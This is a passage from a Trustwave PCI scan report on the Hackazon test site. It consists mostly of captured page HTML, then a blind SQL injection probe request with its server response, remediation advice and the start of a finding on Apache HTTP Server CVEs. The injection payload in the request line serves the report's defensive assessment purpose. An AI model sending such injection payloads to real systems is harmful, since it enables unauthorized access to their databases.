uTKe3mXozxbZ13Q5jpO0kLSyj//QNXOPffsscMOuC92VpfVHZwOvsQSzH
Pg2PkQExdNcjuPVaLqCSrFKnj5+0LuKndvkLgPkAWvpwePW5oOwnCmxlt
ahB8KuAf+pyQJVxN7hAAAAAElFTkSuQmCC" id="loginusericon"
class="userpic small" class="header-user-photo"><b
class="caret"></b></a>
<ul class="dropdown-menu">
<li><a href="/account/orders">My orders</a></li>
<li><a href="/account#profile">My profile</a></li>
<li><a href="/account/documents">My

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 860 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
documents</a></li>
<li><a href="/account/help_articles">Help
Articles</a></li>
<li><a href="/helpdesk">Helpdesk</a></li>
</ul>
</li>
<li class="dropdown hw-login-item">

<a href="/user/logout" class="login-window">Logout</a>


</li>
<li class="dropdown">
<a class="dropdown-toggle js-cart-top-icon" data-
toggle="dropdown" href="#"><span class="glyphicon glyphicon-
shopping-cart"></span></a>
<ul class="dropdown-menu js-cart-top-list cart-top-list"
>
<li><a href="/product/view?id=101"><span class="
pull-left product-name"><small>113x</small>
Diesel Men's Sleenker Skinny-Leg Jean 0608D
</span> &nbsp; <small class="pull-right label label-info">$ 26894,-
</small></a></li><li><a href="/product/view?id=1"><span class="
pull-left product-name"><small>5x</small>
Martha Stewart Crafts Garland, Pink Pom Pom Small
</span> &nbsp; <small class="pull-right label label-info">$ 45,-
</small></a></li><li><a href="/product/view?id=16"><span
class="pull-left product-name"><small>1x</small>
Cricut Explore Electronic Cutting Machine with Cricut Design Space
Free Online Software
</span> &nbsp; <small class="pull-right label label-info">$ 250,-
</small></a></li><li><a href="/product/view?id=64"><span
class="pull-left product-name"><small>1x</small>
Molton Brown Indian Cress Purifying Shampoo, 10 fl. oz.
</span> &nbsp; <small class="pull-right label label-info">$ 30,-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 861 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</small></a></li><li><a href="/product/view?id=142"><span
class="pull-left product-name"><small>1x</small>
InterDesign Pail Waste Can, White
</span> &nbsp; <small class="pull-right label label-info">$ 20,-
</small></a></li><li><a href="/product/view?id=203"><span
class="pull-left product-name"><small>1x</small>
Chocolat
</span> &nbsp; <small class="pull-right label label-info">$ 6.29,-
</small></a></li> <li class="divider"></li>
<li><a href="/cart/view">Show all items in shopping
cart <i class="glyphicon glyphicon-chevron-right"></i></a></li>
</ul>
</li>
</ul>
</div>
<div class="row">
<div class="col-xs-12 col-md-12 col-lg-12">
<div class="row">
<form role="search" action="/search" method="get"
id="searchForm" >
<input type="hidden" name="id" value="" />
<div class="col-xs-12 col-md-12">
<div class="input-group" style="margin-bottom: 10px;">
<div class="input-group-btn">
<button type="button" class="btn btn-default dropdown-
toggle" data-toggle="dropdown" id="searchLabel">All <span
class="caret"></span></button>
<ul class="dropdown-menu" role="menu"
id="searchValue">
<li class="dropdown"><a href="#">All</a></li>
<li class="dropdown
dropdown-submenu"><a href="/category/view?id=49" data-item-
id="49">Unlimited Instant Videos</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 862 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=52" data-item-id="52">Shop Instant
Video</a>
<li><a
href="/category/view?id=51" data-item-id="51">Prime Instant
Video</a>
<li><a
href="/category/view?id=50" data-item-id="50">Amazon Instant
Video</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=44" data-item-id="44">Test
Fire TV</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=48" data-item-id="48">Test Fire TV</a>
<li><a
href="/category/view?id=47" data-item-id="47">Test Fire Game
Controller</a>
<li><a
href="/category/view?id=46" data-item-id="46">Prime Instant
Video</a>
<li><a
href="/category/view?id=45" data-item-id="45">Games for Fire
TV</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=38" data-item-id="38">Sports
& Outdoors</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 863 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a
href="/category/view?id=42" data-item-id="42">Golf</a>
<li><a
href="/category/view?id=41" data-item-id="41">Fan Shop</a>
<li><a
href="/category/view?id=40" data-item-id="40">Cycling</a>
<li><a
href="/category/view?id=39" data-item-id="39">Athletic & Outdoor
Clothing</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=32" data-item-id="32">Home,
Garden & Tools</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=37" data-item-id="37">Patio, Lawn &
Garden</a>
<li><a
href="/category/view?id=36" data-item-id="36">Kitchen & Dining</a>
<li><a
href="/category/view?id=35" data-item-id="35">Furniture &
Decor</a>
<li><a
href="/category/view?id=34" data-item-id="34">Bedding & Bath</a>
<li><a
href="/category/view?id=33" data-item-id="33">Appliances</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=26" data-item-
id="26">Electronics & Computers</a>
<ul class="dropdown-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 864 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a
href="/category/view?id=31" data-item-id="31">Printers & Ink</a>
<li><a
href="/category/view?id=30" data-item-id="30">Musical
Instruments</a>
<li><a
href="/category/view?id=29" data-item-id="29">Cell Phones &
Accessories</a>
<li><a
href="/category/view?id=28" data-item-id="28">Car Electronics</a>
<li><a
href="/category/view?id=27" data-item-id="27">CAMERA, PHOTO &
VIDEO</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=20" data-item-
id="20">Clothing, Shoes & Jewelry</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=25" data-item-id="25">Women</a>
<li><a
href="/category/view?id=24" data-item-id="24">Men</a>
<li><a
href="/category/view?id=23" data-item-id="23">Girls</a>
<li><a
href="/category/view?id=22" data-item-id="22">Boys</a>
<li><a
href="/category/view?id=21" data-item-id="21">Baby</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=14" data-item-id="14"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 865 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Beauty, Health & Grocery</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=19" data-item-id="19">Natural &
Organic</a>
<li><a
href="/category/view?id=18" data-item-id="18">Mens Grooming</a>
<li><a
href="/category/view?id=17" data-item-id="17">Luxury Beauty</a>
<li><a
href="/category/view?id=16" data-item-id="16">Health, Household &
Baby Care</a>
<li><a
href="/category/view?id=15" data-item-id="15">All beauty</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=8" data-item-
id="8">Automotive & Industrial</a>
<ul class="dropdown-
menu">
<li><a
href="/category/view?id=10" data-item-id="10">Automotive Tools &
Equipment</a>
<li><a
href="/category/view?id=9" data-item-id="9">Automotive Parts &
Accessories</a>
</ul>
</li>
<li class="dropdown dropdown-
submenu"><a href="/category/view?id=2" data-item-id="2">Arts,
Crafts & Sewing Coupons</a>
<ul class="dropdown-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 866 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
menu">
<li><a
href="/category/view?id=7" data-item-id="7">Sewing</a>
<li><a
href="/category/view?id=6" data-item-id="6">Scrapbooking</a>
<li><a
href="/category/view?id=5" data-item-id="5">Painting</a>
<li><a
href="/category/view?id=4" data-item-id="4">Jewelry-Making</a>
<li><a
href="/category/view?id=3" data-item-id="3">Craft Supplies</a>
</ul>
</li>
</ul>
</div>
<!-- /btn-group -->
<input type="text" class="form-control"
placeholder="Search products..." maxlength="100"
name="searchString" value="">
<span class="input-group-btn">
<button class="btn btn-default"
type="submit">Search!</button>
</span>
</div>
<!-- /input-group -->
</div>
</form>
</div> </div>
</div>
</div>
<!-- /.container -->
</nav>
</header>
<div id="container">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 867 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="container">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Error: 404 No such category</h1>
<ol class="breadcrumb">
<li><a href="/">Home</a></li>
<li class="active">Error</li>
</ol>
</div>

</div>
<div class="row error-page">
<div class="col-lg-12">
<p>Please try to change your request.</p>
</div>
</div>
</div> </div>

<div class="container" >


<hr>
<footer>
<div class="row">
<div class="col-lg-12">
<p>Copyright &copy; NTObjectives 2014</p>
</div>
</div>
</footer>

<script type="text/x-template" id="tplAlertContent">


<div class="text-center">
<a href="#" class="btn btn-primary js-yes">Yes</a>
<a href="#" class="btn btn-danger js-no">No</a>
</div>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 868 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</script> </div>
</body>
</html>
False Request: GET
http://69.164.223.171/category/view?id=%27+RLIKE+%28SELECT+%2
8CASE+WHEN+%2819%3D20%29+THEN+0x7465787476616c7565+E
LSE+0x28+END%29%29--+ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

False Response: HTTP/1.1 503 Service Temporarily Unavailable


Date: Tue, 06 Aug 2019 04:17:03 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-
check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Content-Length: 35
Connection: close
Content-Type: text/html

503 Service Temporarily Unavailable

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 869 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

7 CVE-2017-9788 Apache HTTP Server 7.5 High Fail URL: http://hackazon.webscantest.com/


CVE-2017-7679 Multiple Vulnerabilities Port: tcp/80
CVE-2017-7668 2.2.x Through 2.2.34 and
CVE-2017-3169 2.4.x prior to 2.4.26 Apache HTTP Server suffers from multiple vulnerabilities in 2.2.x
CVE-2017-3167 through 2.2.34 and 2.4.x prior to 2.4.26. These vulnerabilities are listed
below.

CVE-2017-3167 - A vulnerability exists in the ap_get_basic_auth_pw()


function of Apache HTTP Serverwhere if it used in a third party
extension outside of the authentication phase authentication
requirements can be bypassed.

CVE-2017-3169 - The mod_ssl module in Apache HTTP Server may


dereference a null pointer when ap_hook_process_connection() is called
by third party modules.

CVE-2017-7668 - The ap_find_token() function in Apache HTTP Server is


vulnerable to segmentation faults and other effects from crafted
malicious input.

CVE-2017-7679 - mod_mime can read one byte past its' buffer when
used in a malicious Content-Type response header.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 870 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

hackazon.webscantest.com (MV PCI7)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVE-2017-9788 - The [Proxy-]Authorization headers in Apache HTTP
Server can potentially leak information or experience a segmentation
fault causing a denial

You might also like